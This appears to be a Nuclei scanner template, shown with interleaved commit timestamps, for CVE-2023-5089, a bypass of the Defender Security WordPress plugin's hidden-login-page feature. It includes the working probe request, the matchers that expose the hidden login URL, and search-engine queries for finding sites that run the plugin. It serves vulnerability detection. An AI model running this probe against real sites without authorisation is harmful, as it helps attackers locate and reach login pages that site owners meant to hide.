2024-03-01 17:18:56 +00:00
id : CVE-2023-5089
info :
2024-03-01 18:33:09 +00:00
name : Defender Security < 4.1.0 - Protection Bypass (Hidden Login Page)
2024-03-01 17:18:56 +00:00
author : jpg0mez
2024-03-01 18:33:09 +00:00
severity : medium
2024-03-01 17:18:56 +00:00
description : |
2024-03-08 20:23:07 +00:00
The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is enabled.
2024-03-01 18:33:09 +00:00
remediation : Fixed in 4.1.0
2024-03-01 17:18:56 +00:00
reference :
- https://www.sprocketsecurity.com/resources/discovering-wp-admin-urls-in-wordpress-with-gravityforms
- https://wpscan.com/vulnerability/2b547488-187b-44bc-a57d-f876a7d4c87d/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5089
2024-03-01 18:33:09 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score : 5.3
cve-id : CVE-2023-5089
2024-05-31 19:23:20 +00:00
epss-score : 0.00291
epss-percentile : 0.69035
2024-03-01 18:33:09 +00:00
cpe : cpe:2.3:a:wpmudev:defender_security:*:*:*:*:*:wordpress:*:*
metadata :
2024-03-09 17:38:42 +00:00
verified : true
max-request : 1
2024-03-01 18:33:09 +00:00
vendor : wpmudev
product : defender_security
framework : wordpress
2024-05-31 19:23:20 +00:00
shodan-query : http.html:/wp-content/plugins/defender-security/
fofa-query : body=/wp-content/plugins/defender-security/
2024-03-08 20:23:07 +00:00
publicwww-query : "/wp-content/plugins/defender-security/"
2024-06-07 10:04:29 +00:00
tags : cve,cve2023,wordpress,wpscan,wp-plugin,defender-security,redirect,wpmudev
2024-03-01 17:18:56 +00:00
http :
- method : GET
path :
- "{{BaseURL}}/?gf_page=randomstring"
2024-03-01 18:33:09 +00:00
2024-03-01 17:18:56 +00:00
matchers-condition : and
matchers :
2024-03-08 20:23:07 +00:00
- type : dsl
dsl :
- "!contains(tolower(location), 'wp-login.php')"
2024-03-01 18:33:09 +00:00
2024-03-01 17:18:56 +00:00
- type : word
part : header
2024-03-08 20:23:07 +00:00
words :
- '%2F%3Fgf_page%3Drandomstring&reauth=1'
extractors :
- type : kval
kval :
- location
2024-06-08 16:02:17 +00:00
# digest: 4a0a00473045022100d66beed359c83006b9629ad191773331ca489271eefc9d64a540916b6eda004802206d977265f836902b119d0831d714ae8053ec107bc86e95dd0c2640c04579436a:922c64590222798bb761d5b6d8e72950